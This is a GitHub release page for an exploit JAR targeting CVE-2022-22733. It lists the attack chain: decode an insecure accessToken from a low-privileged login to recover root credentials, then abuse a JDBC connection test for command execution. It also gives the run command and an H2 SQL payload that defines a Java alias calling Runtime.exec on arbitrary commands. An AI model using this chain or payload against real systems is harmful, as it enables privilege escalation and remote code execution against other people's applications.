Skip to content

CVE-2022-22733 JAR

Latest
Latest
Compare
Choose a tag to compare
@Zeyad-Azima Zeyad-Azima released this 25 Apr 12:54
· 3 commits to main since this release
CVE-2022-22733
7d0f814
This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
GPG key ID: 4AEE18F83AFDEB23
Expired
Learn about vigilant mode.

The Exploit Works as the following:

  • Login with the low-privileged account.

  • Obtain the unsecure generated accessToken.

  • Decode the unsecure generated accessToken.

  • Parse the decoded data from the accessToken.

  • Retrive root account credentials from the parsed data.

  • Login with the root account credentials and obtain a full privileges on the application.

  • Send a Connection Test request with abusing of the``JDBC` Attack.

  • Execute jar:

java -jar CVE-2022-22733.jar
  • SQL script code:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
Assets 3